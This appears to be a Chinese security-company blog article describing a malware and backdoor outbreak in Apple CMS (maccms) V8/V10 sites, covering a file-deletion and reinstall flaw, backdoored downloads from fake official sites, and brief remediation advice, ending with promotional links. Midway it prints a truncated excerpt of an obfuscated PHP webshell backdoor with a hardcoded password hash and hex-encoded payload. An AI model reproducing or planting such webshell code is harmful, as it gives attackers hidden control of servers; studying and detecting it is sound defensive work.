蘋果CMS掛馬解決處理過程的文章

時間：2020-03-13

目前蘋果CMS官方在不斷的升級補丁，官方較新的漏洞補丁對于目前爆發(fā)的新漏洞沒有任何效果。較新補丁的用戶網(wǎng)站還是會遭受到掛馬的攻擊，很多客戶因此找到我們SINE安全尋求網(wǎng)站安全技術(shù)上的支持，針對該漏洞我們有著*特的安全解決方案以及防止掛馬攻擊的防護，包括一些未公開的maccms POC漏洞都有修復(fù)補丁。

目前maccms官方被百度網(wǎng)址安全中心提醒您：該站點可能受到黑客攻擊，部分頁面已被非法篡改！蘋果官方網(wǎng)站因為特殊原因已經(jīng)停止訪問，該內(nèi)容被禁止訪問，但是升級補丁較新的網(wǎng)址還是可以打開的。

截圖如下：

蘋果CMS漏洞詳情：

蘋果CMS V8 V10版本存在代碼重裝漏洞，以及代碼后門漏洞，任意文件刪除漏洞，通過CNVD-2019-43865的信息安全漏洞通報，可以確認maccms V10存在漏洞，可以偽造惡意代碼發(fā)送到網(wǎng)站后端進行執(zhí)行，可以刪除網(wǎng)站目錄下的任意文件，可刪除重裝蘋果CMS系統(tǒng)的配置文件，導(dǎo)致可以重新安裝maccms系統(tǒng)，并在安裝過程中插入sql注入代碼到數(shù)據(jù)庫中去執(zhí)行并獲取webshell以及服務(wù)器權(quán)限。

蘋果CMS V8 V10 源代碼存在后門漏洞，經(jīng)過我們SINE安全技術(shù)的檢測發(fā)現(xiàn)，存在后門的原因是，目前百度搜索蘋果官網(wǎng)，maccms官方，排在百度搜索首頁的都是仿冒的網(wǎng)站，真正官網(wǎng)地址是，包括模板，圖片，以及CSS跟真正的官方是一模一樣，很多客戶都是點擊到這個**網(wǎng)站上去進行下載的源代碼，該代碼里隱藏了木馬后門文件,阿里云都無法檢測出來，

<?php

error_reporting(E_ERROR);

@ini_set('display_errors','Off');

@ini_set('max_execution_time',20000);

@ini_set('memory_limit','256M');

header("content-Type: text/html; charset=utf-8");

$password = "21232f297a57a5a743894a0e4a801fc3"; //Viv, bebegim..

define('Viv, bebegim.','Denzel-你的英雄'); // 標題

function s(){

$str = "66756r6374696s6r20737472646972282473747229207o2072657475726r207374725s

7265706p61636528617272617928275p5p272p272s2s272p27253237272p2725323

代碼如上面所示，是加密過的，經(jīng)過我們SINE安全的解密發(fā)現(xiàn)是PHP的腳本木馬，可以繞過各大服務(wù)器廠商的安全檢測，包括阿里云，騰訊云，百度云，華為云。

關(guān)于蘋果CMS網(wǎng)站漏洞的修復(fù)方案與辦法

對任意文件刪除漏洞做安全過濾與檢查，防止del刪除的語句的執(zhí)行，對**傳輸過來的參數(shù)進行嚴格的檢測，不管是get,post,cookies，如果您對代碼不是太懂的話也可以找專業(yè)的網(wǎng)站安全公司來處理解決蘋果CMS網(wǎng)站被攻擊的問題，或者是對重裝文件進行改名以及安裝配置文件進行權(quán)限設(shè)置，只讀權(quán)限，對于存在網(wǎng)站木馬后門的蘋果cms系統(tǒng)，人工對代碼進行安全審計，對所有網(wǎng)站目錄下每個代碼文件都要仔細的排查，可以下載官方的源代碼進行比對。

13280888826

詞條
詞條說明
網(wǎng)站滲透測試之某cms代碼的漏洞分析
客戶網(wǎng)站**時間被攻擊，網(wǎng)站被劫持到了賭博網(wǎng)站上去，通過朋友介紹找到我們SINESAFE做網(wǎng)站的安全防護，我們隨即對客戶網(wǎng)站進行了全面的滲透測試，包括了網(wǎng)站的漏洞檢測與代碼安全測試，針對于發(fā)現(xiàn)的漏洞進行了修復(fù)，包括網(wǎng)站安全部署等等方面，下面我們將這一次的安全應(yīng)急處理過程分享給有需要的客戶。首先客戶網(wǎng)站采用的架構(gòu)是PHP語言開發(fā)，mysql數(shù)據(jù)庫，使用的是linux centos系統(tǒng)作為網(wǎng)站的運行環(huán)
網(wǎng)站被劫持解決網(wǎng)站反復(fù)被跳轉(zhuǎn)的處理方案
臨近2019年底，網(wǎng)站安全事件頻發(fā)，攻擊者加大了對網(wǎng)站的攻擊力度，一定是在為過年錢做準備，大撈一把過個好年。就在較近，某客戶網(wǎng)站被入侵并被篡改了首頁代碼，網(wǎng)站從搜索引擎打開直接跳轉(zhuǎn)到了彩//piao網(wǎng)站上去了，通過朋友介紹找到我們SINESAFE做網(wǎng)站安全服務(wù)，防止網(wǎng)站被攻擊，恢復(fù)網(wǎng)站的正常訪問，關(guān)于此次安全事件的應(yīng)急處理，以及如何做網(wǎng)站的安全加固，我們通過文章的形式記錄一下。2019年12月18
什么是網(wǎng)站系統(tǒng)安全的滲透檢測
建設(shè)網(wǎng)站系統(tǒng)需要做的工作很多，比如架構(gòu)，模板的確認，還有各個安全問題的考慮，比如漏洞，木馬等問題的滲透。而對于滲透這個詞很多人都沒怎么接觸過。相信較近追熱播親愛的，熱愛的這部電視劇的小哥哥姐們，對于滲透這一詞很熟悉吧，但是肯定也會有人疑惑滲透到底是什么呢？簡單地說，滲透通過模擬攻擊者的手段和方法進行滲透攻擊，以檢測系統(tǒng)是否存在漏洞。如果有代碼漏洞，將上傳腳本文件以獲得系統(tǒng)的控制權(quán)。滲透的前提是從攻
網(wǎng)站安全防護措施有哪些
網(wǎng)站安全防護是指出于防止網(wǎng)站受到外來電腦入侵者對其網(wǎng)站進行掛馬，篡改網(wǎng)頁等行為而做出一系列的防御工作。啟動一個新網(wǎng)站是一個令人興奮的項目，充滿了許多重要的步驟和決定。但是，作為網(wǎng)站的所有者，您不僅要處理被黑客入侵的后果，還要對其頁面上的內(nèi)容以及人們用來與之交互的機制負責。如果您計劃存儲用戶信息（例如密碼或電話號碼），則必須妥善保護這些數(shù)據(jù)，否則根據(jù)某些法律，您可能會因數(shù)據(jù)泄露事件而受到罰款。為保護